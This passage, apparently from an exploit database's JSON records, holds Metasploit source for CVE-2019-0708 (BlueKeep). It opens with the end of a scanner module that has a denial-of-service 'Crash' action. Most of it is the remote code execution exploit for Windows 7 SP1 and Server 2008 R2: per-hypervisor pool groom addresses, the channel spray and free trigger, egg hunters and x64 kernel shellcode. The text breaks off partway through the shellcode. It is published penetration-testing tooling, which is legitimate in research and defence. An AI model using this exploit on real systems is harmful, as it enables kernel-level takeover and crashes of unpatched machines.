'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html' ]\n ],\n 'DisclosureDate' => '2019-05-14',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Scan', 'Description' => 'Scan for exploitable targets'],\n ['Crash', 'Description' => 'Trigger denial of service vulnerability'],\n ],\n 'DefaultAction' => 'Scan',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'AKA' => ['BlueKeep']\n }\n )\n )\n end\n\n def report_goods\n report_vuln(\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: name,\n info: 'Behavior indicates a missing 
Microsoft Windows RDP patch for CVE-2019-0708',\n refs: references\n )\n end\n\n def run_host(ip)\n # Allow the run command to call the check command\n\n status = check_host(ip)\n if status == Exploit::CheckCode::Vulnerable\n print_good(status[1].to_s)\n elsif status == Exploit::CheckCode::Safe\n vprint_error(status[1].to_s)\n else\n vprint_status(status[1].to_s)\n end\n\n status\n end\n\n def rdp_reachable\n rdp_connect\n rdp_disconnect\n return true\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n\n def check_host(_ip)\n # The check command will call this method instead of run_host\n status = Exploit::CheckCode::Unknown\n\n begin\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n return Exploit::CheckCode::Safe('The target service is not running or refused our connection.')\n end\n\n status = check_rdp_vuln\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n rescue RdpCommunicationError\n vprint_error('Error communicating RDP protocol.')\n status = Exploit::CheckCode::Unknown\n rescue Errno::ECONNRESET\n vprint_error('Connection reset')\n rescue StandardError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n ensure\n rdp_disconnect\n end\n\n status\n end\n\n def check_for_patch\n begin\n 6.times do\n _res = rdp_recv\n end\n rescue RdpCommunicationError\n # we don't care\n end\n\n # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length\n # The arch governs which of the packets triggers the desired response\n # which is an MCS Disconnect Provider Ultimatum or a timeout.\n\n # Disconnect Provider message of 
a valid size for each platform\n # has proven to be safe to send as part of the vulnerability check.\n x86_string = '00000000020000000000000000000000'\n x64_string = '0000000000000000020000000000000000000000000000000000000000000000'\n\n if action.name == 'Crash'\n vprint_status('Sending denial of service payloads')\n # Length and chars are arbitrary but total length needs to be longer than\n # 16 for x86 and 32 for x64. Making the payload too long seems to cause\n # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing\n # the payload size and sending more of them doesn't seem to improve the\n # reliability. It *seems* to happen more often on x64, I haven't seen it\n # fail against x86. Repeated attempts will generally trigger the DoS.\n x86_string += 'FF' * 1\n x64_string += 'FF' * 2\n else\n vprint_status('Sending patch check payloads')\n end\n\n chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST\n channel_id = [1005].pack('S>')\n x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack('H*')), channel_id)\n\n x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack('H*')), channel_id)\n\n 6.times do\n rdp_send(x86_packet)\n rdp_send(x64_packet)\n\n # A single pass should be sufficient to cause DoS\n if action.name == 'Crash'\n sleep(1)\n rdp_disconnect\n\n sleep(5)\n if rdp_reachable\n print_error(\"Target doesn't appear to have been crashed. 
Consider retrying.\")\n return Exploit::CheckCode::Unknown\n else\n print_good('Target service appears to have been successfully crashed.')\n return Exploit::CheckCode::Vulnerable('The target appears to have been crashed by disconnecting from an incorrectly-bound MS_T120 channel.')\n end\n end\n\n # Quick check for the Ultimatum PDU\n begin\n res = rdp_recv(-1, 1)\n rescue EOFError\n # we don't care\n end\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.') if res&.include?(['0300000902f0802180'].pack('H*'))\n\n # Slow check for Ultimatum PDU. If it doesn't respond in a timely\n # manner then the host is likely patched.\n begin\n 4.times do\n res = rdp_recv\n # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3\n if res.include?(['0300000902f0802180'].pack('H*'))\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.')\n end\n end\n rescue RdpCommunicationError\n # we don't care\n end\n end\n\n Exploit::CheckCode::Safe\n end\n\n def check_rdp_vuln\n # check if rdp is open\n is_rdp, version_info = rdp_fingerprint\n unless is_rdp\n vprint_error('Could not connect to RDP service.')\n return Exploit::CheckCode::Unknown\n end\n rdp_disconnect\n rdp_connect\n is_rdp, server_selected_proto = rdp_check_protocol\n\n requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto\n product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'\n info = \"Detected RDP on #{peer} (Windows version: #{product_version})\"\n\n service_info = \"Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 
'Yes' : 'No'}\"\n info << \" (#{service_info})\"\n\n vprint_status(info)\n\n if requires_nla\n vprint_status('Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n return Exploit::CheckCode::Safe\n end\n\n chans = [\n ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ]\n\n success = rdp_negotiate_security(chans, server_selected_proto)\n return Exploit::CheckCode::Unknown unless success\n\n rdp_establish_session\n\n result = check_for_patch\n\n if result == Exploit::CheckCode::Vulnerable\n report_goods\n end\n\n # Can't determine, but at least we know the service is running\n result\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb"}, {"lastseen": "2020-10-13T17:01:07", "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution. Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets. Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout. 
HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This is a non-standard configuration for normal servers, and the target will crash if the aforementioned Registry key is not set! If the target is crashing regardless, you will likely need to determine the non-paged pool base in kernel memory and set it as the GROOMBASE option.\n", "published": "2019-09-19T11:05:08", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Exploitation and Caveats from zerosum0x0:\n#\n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.\n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)\n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.\n# 4. RDP has chunked messages, so we use this to groom.\n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.\n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND.\n# i. RDPSND only works when\n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0\n# ii. This registry key is not a default setting for server 2008 R2.\n# We should use alternate groom channels or at least detect the\n# channel in advance.\n# 5. Use chunked grooming to fit new data in the freed channel, account for\n# the allocation header size (like 0x38 I think?). At offset 0x100? is where\n# the \"call [rax]\" gadget will get its pointer from.\n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7\n# i. 
Hot-swap memory is another problem because, with certain VMWare and\n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP\n# start. This can be anywhere from 100 mb to gigabytes of offset\n# before the NPP start.\n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB\n# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need\n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an\n# indirect call\n# d. We are limited to 0x400 payloads by channel chunk max size. My\n# current shellcode is a twin shellcode with eggfinders. I spam the\n# kernel payload and user payload, and if user payload is called first it\n# will egghunt for the kernel payload.\n# 6. After channel hole is filled and the NPP is spammed up with shellcode,\n# trigger the free by closing the socket.\n#\n# TODO:\n# * Detect OS specifics / obtain memory leak to determine NPP start address.\n# * Write the XP/2003 portions grooming MS_T120.\n# * Detect if RDPSND grooming is working or not?\n# * Expand channels besides RDPSND/MS_T120 for grooming.\n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/\n#\n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming\n# MS_T120 on XP... 
should be same process as the RDPSND\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking\n\n USERMODE_EGG = 0xb00dac0fefe31337\n KERNELMODE_EGG = 0xb00dac0fefe42069\n\n CHUNK_SIZE = 0x400\n HEADER_SIZE = 0x48\n\n include Msf::Exploit::Remote::RDP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',\n 'Description' => %q(\n The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.\n ),\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit\n 'Ryan Hanson', # @ryHanson - Original exploit\n 'OJ Reeves <oj@beyondbinary.io>', # @TheColonial - Metasploit module\n 'Brent Cook <bcook@rapid7.com>', # @busterbcook - Assembly whisperer\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-0708'],\n ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],\n ['URL', 
'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html']\n ],\n 'DefaultOptions' =>\n {\n 'RDP_CLIENT_NAME' => 'ethdev',\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => CHUNK_SIZE - HEADER_SIZE,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Automatic targeting via fingerprinting',\n {\n 'Arch' => [ARCH_X64],\n 'FingerprintOnly' => true\n },\n ],\n #\n #\n # Windows 2008 R2 requires the following registry change from default:\n #\n # [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd]\n # \"fDisableCam\"=dword:00000000\n #\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8003800000,\n 'GROOMSIZE' => 100\n }\n ],\n [\n # This works with Virtualbox 6\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8002407000\n }\n ],\n [\n # This address works on VMWare 14\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8030c00000\n }\n ],\n [\n # This address works on VMWare 15\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018C00000\n }\n ],\n [\n # This address works on VMWare 15.1\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8102407000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 
0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8004428000\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-05-14',\n 'Notes' =>\n {\n 'AKA' => ['Bluekeep']\n }\n ))\n\n register_advanced_options(\n [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),\n OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),\n OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),\n OptFloat.new('GROOMDELAY', [false, 'Delay in seconds between sending 1 MB of groom packets', 0])\n ]\n )\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n if target['FingerprintOnly']\n fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !')\n end\n\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n is_rdp, server_selected_proto = rdp_check_protocol\n unless is_rdp\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n # We don't currently support NLA in the mixin or the exploit. 
However, if we have valid creds, NLA shouldn't stop us\n # from exploiting the target.\n if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)\n fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n end\n\n chans = [\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ]\n\n @mst120_chan_id = 1004 + chans.length - 1\n\n unless rdp_negotiate_security(chans, server_selected_proto)\n fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')\n end\n\n rdp_establish_session\n\n rdp_dispatch_loop\n end\n\nprivate\n\n # This function is invoked when the 
PAKID_CORE_CLIENTID_CONFIRM message is\n # received on a channel, and this is when we need to kick off our exploit.\n def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)\n # We have to do the default behaviour first.\n super(pkt, user, chan_id, flags, data)\n\n groom_size = datastore['GROOMSIZE']\n pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)\n groom_chan_count = datastore['GROOMCHANNELCOUNT']\n\n payloads = create_payloads(pool_addr)\n\n print_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\")\n\n target_channel_id = chan_id + 1\n\n spray_buffer = create_exploit_channel_buffer(pool_addr)\n spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)\n free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80\n\n # if the exploit is cancelled during the free, target computer will explode\n print_warning(\"<---------------- | Entering Danger Zone | ---------------->\")\n\n print_status(\"Surfing channels ...\")\n rdp_send(spray_channel * 1024)\n rdp_send(free_trigger)\n\n chan_surf_size = 0x421\n spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min\n chan_surf_packet = spray_channel * spray_packets\n chan_surf_count = chan_surf_size / spray_packets\n\n chan_surf_count.times do\n rdp_send(chan_surf_packet)\n end\n\n print_status(\"Lobbing eggs ...\")\n\n groom_mb = groom_size * 1024 / payloads.length\n\n groom_start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n\n groom_mb.times do |current_groom_count|\n tpkts = ''\n for c in 0..groom_chan_count\n payloads.each do |p|\n tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)\n end\n end\n rdp_send(tpkts)\n\n # tasks we do every 1 MB\n if current_groom_count % (1024 / payloads.length) == 0\n\n # adding 
mouse move events keeps the connection alive\n # (this handles a groom duration > 30 seconds, such as over Internet/VPN)\n rdp_move_mouse\n\n # simulate slow connection if GROOMDELAY is set\n if datastore['GROOMDELAY'] && datastore['GROOMDELAY'] > 0\n sleep(datastore['GROOMDELAY'])\n end\n\n groom_current_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n groom_elapsed_time = groom_current_time - groom_start_time\n groom_elapsed_str = \"%02d:%02d:%02d\" % [groom_elapsed_time / 3600,\n groom_elapsed_time / 60%60,\n groom_elapsed_time % 60]\n\n groom_mb_sent = current_groom_count / (1024 / payloads.length) + 1\n vprint_status(\"Sent #{groom_mb_sent}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})\")\n end\n end\n\n # Terminating and disconnecting forces the USE\n print_status(\"Forcing the USE of FREE'd object ...\")\n\n # target is groomed, the early cancellation dangers are complete\n print_warning(\"<---------------- | Leaving Danger Zone | ---------------->\")\n rdp_terminate\n rdp_disconnect\n end\n\n # Helper function to create the kernel mode payload and the usermode payload with\n # the egg hunter prefix.\n def create_payloads(pool_address)\n begin\n [kernel_mode_payload, user_mode_payload].map { |p|\n [\n pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg\n p\n ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\")\n }\n rescue => ex\n print_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\")\n end\n end\n\n def assemble_with_fixups(asm)\n # Rewrite all instructions of form 'lea reg, [rel label]' as relative\n # offsets for the instruction pointer, since metasm's 'ModRM' parser does\n # not grok that syntax.\n lea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/\n asm.gsub!(lea_rel) do |match|\n match = \"lea #{$1}, [rip + #{$2}]\"\n end\n\n # metasm encodes all rep instructions as repnz\n # https://github.com/jjyg/metasm/pull/40\n asm.gsub!(/rep+\\smovsb/, 'db 0xf3, 
0xa4')\n\n encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded\n\n # Fixup above rewritten instructions with the relative label offsets\n encoded.reloc.each do |offset, reloc|\n target = reloc.target.to_s\n if encoded.export.key?(target)\n # Note: this assumes the address we're fixing up is at the end of the\n # instruction. This holds for 'lea' but if there are other fixups\n # later, this might need to change to account for specific instruction\n # encodings\n if reloc.type == :i32\n instr_offset = offset + 4\n elsif reloc.type == :i16\n instr_offset = offset + 2\n end\n encoded.fixup(target => encoded.export[target] - instr_offset)\n else\n raise \"Unknown symbol '#{target}' while resolving relative offsets\"\n end\n end\n encoded.fill\n encoded.data\n end\n\n # The user mode payload has two parts. The first is an egg hunter that searches for\n # the kernel mode payload. The second part is the actual payload that's invoked in\n # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel\n # and user mode payloads around the heap in different packets because we don't have\n # enough space to put them both in the same chunk. 
Given that code exec can result in\n # landing on the user land payload, the egg is used to go to a kernel payload.\n def user_mode_payload\n\n asm = %Q^\n_start:\n lea rcx, [rel _start]\n mov r8, 0x#{KERNELMODE_EGG.to_s(16)}\n_egg_loop:\n sub rcx, 0x#{CHUNK_SIZE.to_s(16)}\n sub rax, 0x#{CHUNK_SIZE.to_s(16)}\n mov rdx, [rcx - 8]\n cmp rdx, r8\n jnz _egg_loop\n jmp rcx\n ^\n egg_loop = assemble_with_fixups(asm)\n\n # The USERMODE_EGG is required at the start as well, because the exploit code\n # assumes the tag is there, and jumps over it to find the shellcode.\n [\n USERMODE_EGG,\n egg_loop,\n USERMODE_EGG,\n payload.raw\n ].pack('<Qa*<Qa*')\n end\n\n def kernel_mode_payload\n\n # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya\n #\n # This shellcode was written originally for eternalblue exploits\n # eternalblue_exploit7.py and eternalblue_exploit8.py\n #\n # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)\n #\n # Note:\n # - The userland shellcode is run in a new thread of system process.\n # If userland shellcode causes any exception, the system process get killed.\n # - On idle target with multiple core processors, the hijacked system call\n # might take a while (> 5 minutes) to get called because the system\n # call may be called on other processors.\n # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.\n # This is ok because some Windows functions do not require a shadow stack.\n # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.\n # Note: the Windows 8 version macros are removed below\n # - The userland payload MUST be appened to this shellcode.\n #\n # References:\n # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)\n # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c\n\n data_kapc_offset = 0x30\n\n data_hal_original_syscall_shadow_common_offset_offset = 0x20\n 
data_hal_fake_syscall_spinlock_offset = 0x10\n\n data_nt_kernel_addr_offset = 0x8\n data_origin_syscall_offset = 0\n data_peb_addr_offset = -0x10\n data_queueing_kapc_offset = -0x8\n hal_heap_storage = 0xffffffffffd04100\n\n # These hashes are not the same as the ones used by the\n # Block API so they have to be hard-coded.\n createthread_hash = 0x835e515e\n keinitializeapc_hash = 0x6d195cc4\n keinsertqueueapc_hash = 0xafcc4634\n psgetcurrentprocess_hash = 0xdbf47c78\n psgetprocessid_hash = 0x170114e1\n psgetprocessimagefilename_hash = 0x77645f3f\n psgetprocesspeb_hash = 0xb818b848\n psgetthreadteb_hash = 0xcef84c3e\n spoolsv_exe_hash = 0x3ee083d8\n zwallocatevirtualmemory_hash = 0x576e99ea\n\n asm = %Q^\nshellcode_start:\n ; egg tag\n nop\n nop\n nop\n nop\n\nsetup_syscall_shadow_hook:\n ; IRQL is PASSIVE_LEVEL when got code execution\n ;int 0x3\n\n mov rbp, #{hal_heap_storage}\n\n ; allow interrupts while executing shellcode\n sti\n call r3_to_r0_start\n cli\n\n ;--------------------- HACK crappy thread cleanup --------------------\n ; This code is effectively the same as the epilogue of the function that calls\n ; the vulnerable function in the kernel, with a tweak or two.\n ; TODO: make the lock not suck!!\n mov rax, qword [gs:0x188]\n add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++\n lea r11, [rsp+0b8h]\n xor eax, eax\n mov rbx, [r11+30h]\n mov rbp, [r11+40h]\n mov rsi, [r11+48h]\n mov rsp, r11\n pop r15\n pop r14\n pop r13\n pop r12\n pop rdi\n ret\n\nr3_to_r0_start:\n ; save used non-volatile registers\n push r15\n push r14\n push rdi\n push rsi\n push rbx\n push rax ; align stack by 0x10\n\n ;======================================\n ; find nt kernel address\n ;======================================\n mov r15, qword [gs:0x38] ; get IdtBase of KPCR\n mov r15, qword [r15 + 0x4] ; get ISR address\n shr r15, 0xc ; strip to page size\n shl r15, 0xc\n\n_x64_find_nt_walk_page:\n sub r15, 0x1000 ; walk along page size\n cmp word [r15], 0x5a4d ; 
'MZ' header\n jne _x64_find_nt_walk_page\n\n ; save nt address for using in KernelApcRoutine\n mov [rbp+#{data_nt_kernel_addr_offset}], r15\n\n ;======================================\n ; get current EPROCESS and ETHREAD\n ;======================================\n mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR\n mov edi, #{psgetcurrentprocess_hash}\n call win_api_direct\n xchg rcx, rax ; rcx = EPROCESS\n\n ; r15 : nt kernel address\n ; r14 : ETHREAD\n ; rcx : EPROCESS\n\n ;======================================\n ; find offset of EPROCESS.ImageFilename\n ;======================================\n mov edi, #{psgetprocessimagefilename_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)\n mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename\n\n\n ;======================================\n ; find offset of EPROCESS.ThreadListHead\n ;======================================\n ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)\n ; if offset of ImageFilename is more than 0x400, current is (Win8+)\n\n cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename\n jb _find_eprocess_threadlist_offset_win7\n add eax, 0x10\n_find_eprocess_threadlist_offset_win7:\n lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead\n\n ;======================================\n ; find offset of ETHREAD.ThreadListEntry\n ;======================================\n\n lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead\n mov r9, r8\n\n ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700\n_find_ethread_threadlist_offset_loop:\n mov r9, qword [r9]\n\n cmp r8, r9 ; check end of list\n je _insert_queue_apc_done ; not found !!!\n\n ; if (r9 - r14 < 0x700) found\n mov rax, r9\n sub rax, r14\n cmp rax, 0x700\n ja _find_ethread_threadlist_offset_loop\n sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)\n\n\n ;======================================\n ; find offset of 
